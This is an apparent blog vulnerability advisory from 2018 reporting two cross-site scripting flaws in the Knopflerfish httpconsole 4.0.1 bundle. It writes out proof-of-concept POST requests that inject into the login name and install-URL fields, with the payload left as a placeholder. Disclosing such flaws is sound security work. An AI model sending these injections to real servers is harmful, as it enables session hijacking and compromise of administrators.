Tuesday, July 24, 2018

Knopflerfish bundle httpconsole 4.0.1 XSS

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Cross Site Scripting x2
[x] Vendor: Knopflerfish Project
[x] Vendor Website: https://www.knopflerfish.org
[x] Bundle Name: httpconsole
[x] Bundle Version: 4.0.1
[x] Bundle DL: https://www.knopflerfish.org/releases/current/osgi/jars/httpconsole/httpconsole_all-4.0.1.jar
[x] Found by: Anarchy Angel
[x] Twitter: @anarchyang31
[x] URL: https://aahideaway.blogspot.com
[x] Mail: anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[1] Pre-authentication XSS in login page.
Method: POST
URL: http://knopflerfish-server:8080/servlet/console
Variable: loginname

exp:
POST /servlet/console HTTP/1.1
Host: knopflerfish-server:8080
...

loginname=[XSS]&loginpwd=asd&login_cmd=Login
====


[2] Post-authentication XSS in management console.
Method: POST
URL: http://knopflerfish-server:8080/servlet/console
Variable: cmd_install_url

exp:
POST /servlet/console HTTP/1.1
Host: knopflerfish-server:8080
...

bundle_id=29&cmd_install_url=[XSS]&cmd_installurl=install

Ummm firsties? :)